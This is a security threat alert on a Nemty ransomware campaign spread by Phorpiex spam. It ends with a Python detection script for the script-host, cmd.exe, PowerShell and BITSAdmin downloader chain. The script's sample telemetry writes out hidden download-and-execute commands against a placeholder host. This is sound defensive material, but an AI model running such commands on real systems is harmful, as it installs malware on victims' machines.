Rewterz Threat Alert – Nemty Ransomware – Asia Pacific Mailboxes Swarmed by Dual Downloaders
Severity
High
Analysis Summary
A new Nemty ransomware campaign shows changes in its distribution methods. The first wave of Nemty activity spread via RDP and quickly moved to the Phorpiex botnet, which pushed the ransomware to SMB hosts with weak credentials. In this new campaign the Phorpiex botnet is still leveraged, but this time to send spam emails. These emails carry a ZIP archive as an attachment and a subject line consisting of nothing but a smiley emoji, most likely chosen to evade keyword-based detection in spam filters.

Inside the ZIP archive is a VBScript file that downloads and executes the final payload. The script invokes cmd.exe, which in turn attempts the download with both PowerShell and BITSAdmin (bitsadmin.exe); using two independent download mechanisms increases the chance of infection if one of them is blocked by a firewall or antivirus product. In some samples, garbage code was added to the script to obfuscate it and evade static detection. The Nemty ransomware payload is downloaded as an executable from a known Phorpiex server.
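The process chain described above (script host launched from an archive, cmd.exe, then PowerShell and BITSAdmin used as alternate downloaders) is what a detection engineer would hunt for in endpoint telemetry. The following is an added example written for this alert, not code from Rewterz or from the campaign itself. It walks a small set of constructed Sysmon-style process-creation events (PIDs, paths, hostnames and file names are placeholders, not indicators from the campaign) and flags any cmd.exe that descends from wscript.exe or cscript.exe and carries download activity, rating the case higher when both download methods are present. It generalises slightly beyond the text by also treating cscript.exe as a script host.

```python
"""Hunt for the script-host -> cmd.exe -> PowerShell / bitsadmin downloader chain.

Added example for this alert; not Rewterz's or the campaign's code.
The events below are constructed Sysmon-style process-creation records.
"""
import re

# Download indicators. Patterns are deliberately narrow; tune to your environment.
PS_DOWNLOAD = re.compile(
    r"(DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer)",
    re.IGNORECASE,
)
BITS_DOWNLOAD = re.compile(r"bitsadmin(?:\.exe)?\b.*?/(transfer|download|addfile)", re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Constructed telemetry (placeholder hosts/paths). pid 300 is the dual-downloader case,
# pid 700 a single-method case under cscript.exe, pid 800 an admin using bitsadmin
# from a console started by explorer.exe (should not fire).
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\user\AppData\Local\Temp\Rar$DI\invoice.vbs"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"""cmd.exe /c powershell -w hidden -c "(New-Object Net.WebClient).DownloadFile('http://dl.example.invalid/payload.exe','%TEMP%\payload.exe')" & bitsadmin /transfer job /download /priority high http://dl.example.invalid/payload.exe %TEMP%\payload.exe & start %TEMP%\payload.exe"""},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"""powershell -w hidden -c "(New-Object Net.WebClient).DownloadFile('http://dl.example.invalid/payload.exe','%TEMP%\payload.exe')" """},
    {"pid": 500, "ppid": 300, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job /download /priority high http://dl.example.invalid/payload.exe %TEMP%\payload.exe"},
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\System32\cscript.exe", "cmdline": "cscript.exe update.vbs"},
    {"pid": 700, "ppid": 600, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c bitsadmin /transfer upd /download http://dl.example.invalid/u.exe %TEMP%\u.exe"},
    {"pid": 800, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c bitsadmin /transfer patch /download http://updates.example.invalid/p.msu C:\patches\p.msu"},
]


def basename(image):
    """Lower-cased file name of an image path (handles both slash styles)."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def build_tree(events):
    """Index events by pid and group them by parent pid."""
    by_pid = {e["pid"]: e for e in events}
    children = {}
    for e in events:
        children.setdefault(e["ppid"], []).append(e)
    return by_pid, children


def has_script_host_ancestor(pid, by_pid, max_depth=4):
    """Walk up the parent chain looking for wscript/cscript within max_depth hops."""
    seen = set()
    cur = by_pid.get(pid)
    for _ in range(max_depth):
        if cur is None or cur["pid"] in seen:
            return False
        seen.add(cur["pid"])
        parent = by_pid.get(cur["ppid"])
        if parent is None:
            return False
        if basename(parent["image"]) in SCRIPT_HOSTS:
            return True
        cur = parent
    return False


def download_methods(cmd_event, children):
    """Download methods visible on cmd.exe's own command line and on its children."""
    methods = set()
    texts = [cmd_event["cmdline"]] + [c["cmdline"] for c in children.get(cmd_event["pid"], [])]
    for text in texts:
        if re.search(r"powershell", text, re.IGNORECASE) and PS_DOWNLOAD.search(text):
            methods.add("powershell")
        if BITS_DOWNLOAD.search(text):
            methods.add("bitsadmin")
    return methods


def detect(events):
    """Return one finding per cmd.exe that descends from a script host and downloads."""
    by_pid, children = build_tree(events)
    findings = []
    for e in events:
        if basename(e["image"]) != "cmd.exe":
            continue
        if not has_script_host_ancestor(e["pid"], by_pid):
            continue
        methods = download_methods(e, children)
        if not methods:
            continue
        # Two independent downloaders under a script host is the pattern this alert describes.
        severity = "high" if len(methods) >= 2 else "medium"
        findings.append({"pid": e["pid"], "methods": sorted(methods), "severity": severity})
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f)
```

The parent-chain check is what keeps the rule from firing on an administrator who types `bitsadmin /transfer` into a console (pid 800 above); the severity split reflects that either downloader alone is common in benign automation while the pair, launched from a script dropped out of an archive, is the campaign's signature.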